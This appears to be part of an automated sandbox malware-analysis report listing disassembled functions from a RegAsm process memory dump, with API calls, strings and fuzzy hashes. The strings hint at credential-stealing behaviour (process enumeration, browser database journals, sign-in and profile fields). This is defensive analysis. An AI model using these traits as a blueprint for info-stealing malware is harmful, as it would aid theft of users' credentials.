                                                                                                                                                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$FreeLoadMessage
                                                                                                                                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                      • API String ID: 3897320386-317687271
                                                                                                                                                                                                                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                                                      Function 004138C1 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 49COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                      • API String ID: 4271163124-70141382
                                                                                                                                                                                                                      • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                                                                                                                      • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                                                      Function 0041383D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 44COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 4139908857-3953557276
                                                                                                                                                                                                                      • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                      • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                                                      Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID: -journal$-wal
                                                                                                                                                                                                                      • API String ID: 438689982-2894717839
                                                                                                                                                                                                                      • Opcode ID: 37fb56b1d4f1593c9e9a65fc3dae6402b3efa77c0a3856e4608dc722659a6660
                                                                                                                                                                                                                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37fb56b1d4f1593c9e9a65fc3dae6402b3efa77c0a3856e4608dc722659a6660
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                                                      Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                                                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                                                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3975816621-0
                                                                                                                                                                                                                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                                                      Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                                                      • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                                                      • API String ID: 1214746602-2708368587
                                                                                                                                                                                                                      • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                                                      Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2313361498-0
                                                                                                                                                                                                                      • Opcode ID: 6be8936133b9872846cd53c6fbf8727739f7c5809b7a21bfe8b407a08affae9f
                                                                                                                                                                                                                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6be8936133b9872846cd53c6fbf8727739f7c5809b7a21bfe8b407a08affae9f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                                                      Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                                                      • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                                                        • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2047574939-0
                                                                                                                                                                                                                      • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                                      • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                                                      Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4218492932-0
                                                                                                                                                                                                                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                                                      Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                      • API String ID: 438689982-4203073231
                                                                                                                                                                                                                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                                                      Function 0040BDB0 Relevance: 10.7, APIs: 7, Instructions: 151COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3212833200-0
                                                                                                                                                                                                                      • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                                                      Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                                                      • API String ID: 3510742995-2446657581
                                                                                                                                                                                                                      • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                      • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                                                      Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4281309102-0
                                                                                                                                                                                                                      • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                                                      Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintfwcscat
                                                                                                                                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                      • API String ID: 384018552-4153097237
                                                                                                                                                                                                                      • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                                                      Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                      • API String ID: 2029023288-3849865405
                                                                                                                                                                                                                      • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                                      • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                                                      Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405455
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405483
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                                                      • String ID: 6$\
                                                                                                                                                                                                                      • API String ID: 404372293-1284684873
                                                                                                                                                                                                                      • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                                                      Function 0041851E Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AttributesErrorFileLastSleep$free
